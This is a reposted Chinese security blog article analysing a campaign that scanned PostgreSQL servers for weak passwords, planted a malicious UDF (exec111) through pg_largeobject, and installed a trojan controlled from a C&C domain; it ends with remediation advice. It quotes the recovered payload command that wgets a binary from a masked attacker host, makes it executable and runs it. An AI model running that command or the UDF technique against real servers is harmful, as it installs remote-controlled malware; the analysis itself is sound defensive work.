转载

数千台PostgreSQL服务器的噩梦

Author:梨花带雨

0x00 前言

近日，曝露出一起利用PostgreSQL弱口令批量植入木马的事件。本文将分享对此次事件的追踪过程，从攻击方式，用到的工具，到攻击的范围，还原整个攻击事件。

0x01 发现

我们发现这个传播源头为一个HFS文件服务器：

数千台PostgreSQL服务器的噩梦

在HFS服务器中，发现了黑客用来批量扫描漏洞和自动攻击的程序：ps.exe和pexec.exe。下载到本地进行分析之后，判定此工具为针对PostgreSQL数据库的自动化攻击程序。

程序使用了C#编写，ps.exe负责扫描PostgreSQL服务弱口令,将扫描结果通过web接口记录到文件:

数千台PostgreSQL服务器的噩梦

黑客将扫描到弱口令的IP列表导入到pexec.exe，程序会首先判断服务器PostgreSQL的版本，通过SQL写入对应的/tmp/testproxy.so文件，然后创建名为exec111的UDF函数，最后通过UDF执行恶意指令。

有趣的是，我们在利用程序中并没有发现针对windows版本的postgresql进行利用的代码，说明黑客的程序还是一个半成品。下面是针对linux下PostgreSQL 9.3版本的部分利用代码：

数千台PostgreSQL服务器的噩梦

在两个程序中，作者都写入了对硬件CPU ID的判断，程序仅允许在指定机器运行，但是作者却没对程序代码做混淆和加壳：

数千台PostgreSQL服务器的噩梦

在攻击者HFS上，我们还发现了黑客已经扫描到的PostgreSQL弱口令和利用成功的IP列表：

数千台PostgreSQL服务器的噩梦

这份数据里包含了被植入木马的2626个IP地址，以及刚扫描出的1217台存在弱口令的PostgreSQL服务器IP地址。

进一步对攻击者植入的UDF程序进行逆向分析，发现该UDF执行了如下命令：

#!bash wget -P /tmp/ http://***.**.***.*:1234/testproxy -O /tmp/testproxy chmod 777 /tmp/testproxy /tmp/testproxy > testtmp & rm -rf ./testproxy

testproxy是真正的木马程序，启动后会尝试解析 ******.com 域名，并连接其80端口，等待C&C发送指令并执行

0x02 攻击链路还原

黑客通过ps.exe程序，全网扫描存在弱口令和空口令的PostgreSQL服务器并将IP保存。
利用PostgreSQL pg_largeobject的特性，对漏洞主机发起攻击：将恶意udf分段写入PosrgreSQL表中，并导出实体文件到: /tmp/testproxy.so
从/tmp/testproxy.so导入恶意代码，创建UDF函数并执行，下载恶意文件传播源（HFS服务器）上的testproxy木马并运行。
木马启动后会尝试连接 baby***9.com 域名的 80端口，等待C&C发送指令。

0x03 漏洞影响

攻击者扫描全网存在弱口令和空口令的PostgreSQL数据库主机，通过UDF函数植入木马，通过木马程序，攻击者可以控制受害机器发起恶意行为。我们推测黑客还处于批量“抓鸡”阶段，可能会利用在DDos领域。

0x04影响范围

全国很多台服务器运行着PostgreSQL服务，其中可以通过弱口令登录PostgreSQL的服务器有并不在少数。

在分析PostgreSQL弱口令的过程中，我们注意到了PostgreSQL的一个特性，即“信任IP登录”。在pg_hba.conf文件中，如果把某个IP段的auth-method字段配置为“trust”，意味着在该IP段下不需要任何验证即可访问数据库中所有数据。对上述1353台存在弱口令的服务器进行深入分析，我们发现超过50%的PostgreSQL对所有IP都开启了“trust”模式，这些服务器都存在极大的安全风险！

数千台PostgreSQL服务器的噩梦

0x05 修复建议

禁止postgresql以root权限运行，建议使用独立帐号运行
```
#!bash adduser dbuser sudo su - dbuser 
```

修改数据库帐号为强密码，例如

#!bash alter user postgres with password 'aliyunSecurity1234*_*';

检查PostgreSQL配置文件pg_hba.conf中是否存在： host all all 0.0.0.0/0 trust ，建议修改为使用密码认证。

查看是否存在恶意UDF函数

#!bash select proname,prosrc from pg_proc where proname = 'exec111';

查看是否存在可疑UDF函数

#!bash select proname,prosrc from pg_proc; //查看哪些函数不是系统预设的、或者管理员自己添加的

查看是否存在可疑存储过程
```
#!bash select tgrelid from pg_trigger; 
```
检查自己服务器是否存在/tmp/testproxy.so文件

原文 http://drops.wooyun.org/tips/12646

正文到此结束

所属分类：编程技术

本文标签： 漏洞 http root ip 数据主机 web 自动化黑客 src wget db UI Select linux 端口配置解析 sql 域名 windows 安全代码下载认证数据库管理 Word 服务器
版权声明： 本文为互联网转载文章，出处已在文章中说明(部分除外)。如果侵权，请联系本站长删除，谢谢。
本文海报： 生成海报一生成海报二

其他链接

关于本站

本站定位：个人技术类博客

本站作用：写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

数千台PostgreSQL服务器的噩梦

Author:梨花带雨

0x00 前言

0x01 发现

0x02 攻击链路还原

0x03 漏洞影响

0x04影响范围

0x05 修复建议

热门推荐

相关文章

说给你听

本文目录

随机标签

书籍教程

近期评论

网站信息

其他链接

关于本站

问题交流